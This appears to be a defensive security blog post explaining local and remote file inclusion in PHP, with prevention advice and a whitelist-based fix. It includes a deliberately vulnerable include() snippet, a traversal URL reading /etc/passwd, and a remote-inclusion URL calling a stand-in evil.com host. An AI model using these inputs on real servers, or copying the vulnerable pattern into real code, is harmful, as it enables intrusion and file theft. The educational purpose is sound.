Although not very common, file inclusion bugs can still be encountered in the wild and can prove to have a severe impact.

What is File Inclusion?

File inclusion is a type of bug where an attacker tricks the web application into exposing or running files on the web server.

Impact

File inclusion bugs can be divided into two categories, and the severity of the bug depends on which category it falls into.

A successful attack can lead to sensitive information disclosure, cross-site scripting (XSS), remote code execution (RCE) and even full system compromise.

Local File Inclusion (LFI)

Using LFI an attacker can only include local files, i.e. files that are already present on the server.

Imagine you come across a URL:

http://domain.com/?file=home

The following is an example of the vulnerable PHP code.

<?php
// Vulnerable: the file name comes straight from the query string and is passed to include() without any validation.
$file = $_GET['file'];
include($file);

This means that the server takes the filename from the GET parameter and includes it as-is. The attacker can exploit this with directory traversal, requesting sensitive files on the server such as:

http://domain.com/?file=../../../etc/passwd

Remote File Inclusion (RFI)

Similar to LFI, Remote File Inclusion occurs when an attacker supplies the URL of a file on a malicious website as the file input. An example of this:

http://domain.com/?file=http://evil.com/evil.php

This vulnerability can be critical, as code hosted anywhere on the internet could be executed on the server.

How to prevent File Inclusion?

The best way to prevent File Inclusion bugs is to:

  1. Never include files based on user input.
  2. If that is not possible, you should maintain a whitelist of files that can be included.

Input validation (for example, filtering out "../" or "http://") can be used as well, but it is not an effective solution on its own, as attackers will most likely search for tricks and clever ways to bypass the filter.
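The following is an added example, not code from the original post, showing what the whitelist recommendation looks like when applied to the vulnerable include($_GET['file']) snippet above. It assumes a hypothetical pages/ directory next to the script containing three templates (home.php, about.php, contact.php); those names and the path are assumptions for the example.

```php
<?php
// Added example (not from the original post): a safe replacement for
// `include($_GET['file'])` that follows the two recommendations above.
declare(strict_types=1);

// 1. Whitelist: map the user-supplied page name to a concrete file on disk.
//    Only the keys listed here can ever be included, and the file name is
//    never derived from the request itself. (Assumed page names.)
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Directory the page templates live in (hypothetical path).
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Resolve a page name to an absolute path, or return null if the request
 * does not correspond to a whitelisted page.
 *
 * Constructed inputs and their outcome:
 *   'home'                    -> PAGES_DIR/home.php (if the file exists)
 *   '../../../etc/passwd'     -> null (not a whitelist key)
 *   'http://evil.com/evil.php'-> null (not a whitelist key)
 */
function resolvePage(string $name): ?string
{
    // Reject anything not in the whitelist. This single check already blocks
    // traversal and remote URLs, because neither is a key of PAGES.
    if (!array_key_exists($name, PAGES)) {
        return null;
    }

    $path = realpath(PAGES_DIR . '/' . PAGES[$name]);
    $base = realpath(PAGES_DIR);

    // Defence in depth: even with a whitelist, make sure the resolved file is
    // really inside PAGES_DIR (guards against a mistaken whitelist entry or a
    // symlink pointing elsewhere). realpath() returns false if the file is missing.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $path;
}

// Request handling. Unknown or manipulated values get a 404 instead of
// being handed to include(). The is_string() check matters because
// `?file[]=home` makes $_GET['file'] an array, not a string.
$requested = $_GET['file'] ?? 'home';
if (!is_string($requested) || ($page = resolvePage($requested)) === null) {
    http_response_code(404);
    echo 'Page not found';
    exit;
}
include $page;
```

Two design notes: the whitelist lookup is the real control, so the traversal and URL inputs are rejected before any filesystem or network access happens, and the realpath() check only exists to catch mistakes in the whitelist itself. Keeping allow_url_include=Off in php.ini (the default) additionally stops include() from fetching http:// URLs at all, but that setting does nothing against LFI, which is why the whitelist is still needed.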

Follow us on Twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.